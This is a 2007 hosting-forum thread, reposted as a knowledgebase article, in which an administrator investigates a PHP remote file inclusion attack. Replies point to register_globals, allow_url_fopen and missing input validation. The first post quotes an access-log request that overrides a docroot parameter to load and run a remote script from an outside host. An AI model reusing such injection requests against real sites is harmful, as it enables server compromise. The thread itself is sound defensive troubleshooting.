Portal Home > Knowledgebase > Articles Database > PHP exploit
PHP exploit
Posted by samsamdb, 11-25-2007, 04:00 PM |
Just discovered a php exploit on a client's domain.
Found this in the access_log
http://www.domain.com/blog.php/onead...nhead.php?path[docroot]
=http://musicrox1.altervista.org/rmod.txt?&act=ls&d=/home/httpd/vhosts/domain.com/httpdocs/pearus/.bash/
&sort=0a
Take a look at rmod.txt
http://musicrox1.altervista.org/rmod.txt
then found this in a conf.txt in the /pearus/.bash folder
contents of the .bash folder:
Still trying to dig in some more to figure out how they were able to exploit
here's the first few lines of their blog.php
If anyone can think of anything else to dig for, please post ..
thanks
|
Posted by Harzem, 11-25-2007, 04:04 PM |
Is register_globals on?
|
Posted by Steve_Arm, 11-25-2007, 04:06 PM |
Where is $path["docroot"] validated to be what it should be?
You need to make this false:
http://gr2.php.net/manual/en/ref.fil...llow-url-fopen
|
Posted by samsamdb, 11-25-2007, 04:07 PM |
PHP 'safe_mode' on " is unchecked in the plesk control panel for that domain.
but register_globals is On in the php.ini
|
Posted by samsamdb, 11-25-2007, 04:08 PM |
I guess that's where the exploit is .. the customer didn't do any error checking so anyone can override docroot by passing it in the URL parameters ....
|
Posted by Harzem, 11-25-2007, 04:10 PM |
That's where the exploit is. Turn off register_globals at all prices.
|
Posted by samsamdb, 11-25-2007, 04:17 PM |
Done .. globals now off .. if a customer doesn't like it .. let's see what complaints come in ...
|
Posted by Harzem, 11-25-2007, 04:33 PM |
The users that use php scripts written in 1985 will complain If too much is recieved, you should warn them about security and add a htaccess file for those you want. But let them know they will be asking for trouble.
|
Posted by samsamdb, 11-25-2007, 04:39 PM |
I don't mind that at all ... if they complain, I'll threaten them with "Harzem"! :-)
|
Posted by foobic, 11-25-2007, 06:29 PM |
It's a good idea to turn off register_globals but it won't necessarily solve this problem (although with a bit of luck it may break the script altogether!). Even with register_globals off badly-written scripts that don't validate user inputs can still be vulnerable to remote includes.
So don't ignore the other good advice:
|
Add to Favourites Print this Article
Also Read